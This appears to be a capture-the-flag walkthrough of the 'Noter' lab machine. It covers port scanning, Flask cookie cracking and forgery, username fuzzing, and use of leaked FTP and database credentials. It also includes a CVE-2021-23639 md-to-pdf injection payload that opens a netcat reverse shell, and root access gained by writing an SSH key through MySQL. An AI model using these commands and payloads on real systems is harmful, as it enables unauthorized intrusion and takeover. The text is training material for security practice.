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209 lines (106 loc) · 4.38 KB

File metadata and controls

209 lines (106 loc) · 4.38 KB
nmap -p-  --min-rate 10000 -Pn 

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After detection of open ports, let's do greater nmap scan for these ports.

nmap -A -sC -sV -p21,22,5000 -Pn

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Let's look at web application for port 5000.

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Let's create account and try to understand dashboard page's working principle.

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I looked at my cookie on HTTP request headers.

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As this is Python application, let's try to decode this cookie via flask-unsign tool.

flask-unsign --decode --cookie '{cookie}'

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Let's try to find secret value by brute-forcing via using rockyou.txt wordlist.

flask-unsign --unsign --cookie "{secret}" -w /usr/share/wordlists/rockyou.txt --no-literal-eval 

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Let's try to encode Flask cookie via admin user.

flask-unsign --sign --cookie "{'logged_in': True, 'username': 'admin'}" --secret 'secret123'

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But it doesn't work as because there's no admin user.

Let's fuzz possible usernames.

wfuzz -u -d "username=FUZZ&password=junkpassword" -w /usr/share/seclists/Usernames/Names/names.txt --hs "Invalid credentials"

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From this result, I see that blue user is possible, let's create session cookie for this user.

flask-unsign --sign --cookie "{'logged_in': True, 'username': 'blue'}" --secret 'secret123'

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While we replace this session cookie, I already on Dashboard of blue user.

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I found such a leak which contains FTP credentials.

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blue: blue@Noter!

Let's connect into FTP.

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I get policy.pdf file and read content of this.

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So due to this Password Creation, I can guess ftp_admin credentials.

ftp_admin: ftp_admin@Noter!

Let's connect into FTP via this credentials.

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I get two backup files which have .zip extension.

I find hard-coded credentials from file.

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root: Nildogg36

On misc directory, I find a script called md-to-pdf.js file which uses mdToPdf library, I look at the version of this library on package-lock.json file.

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I searched publicly known exploit for this library and find Code Injection vulnerability whose CVE-2021-23639.

Let's run payload to get reverse shell. I add this payload into Export directory from cloud feature on /export_note_remote endpoint.

---js\n((require("child_process")).execSync("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1337 >/tmp/f"))\n---RCE

I also open http.server to serve this exploit file.

python3 -m http.server --bind 8080

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I submit this HTTP url to get exploit file from my http.server.

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Hola! I got reverse shell from port 1337.

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Let's make interactive shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo;fg
export TERM=xterm
export SHELL=bash

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For Privilege Escalation, I will try to use credentials which I grabbed from .zip file on FTP for mysql service.

root: Nildogg36

Let's check this credentials work or not.

mysql -h -u root -p

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As we are root user, we can write data into files.

So,for Privilege Escalation, I just add my public key into root user's authorized_keys file via MySQL query.

select "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFNO12UEKYlk6zS+SIpXCvvW7+vf3Jx89Vaw5S9pdj7U root@kali" into outfile "/root/.ssh/authorized_keys2";

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Note: This doesn't work for authorized_keys file, that's why I added 2 to end of file name.

Let's connect into machine via private key of attacker user by using ssh command.

ssh -i /root/.ssh/id_ed25519 root@


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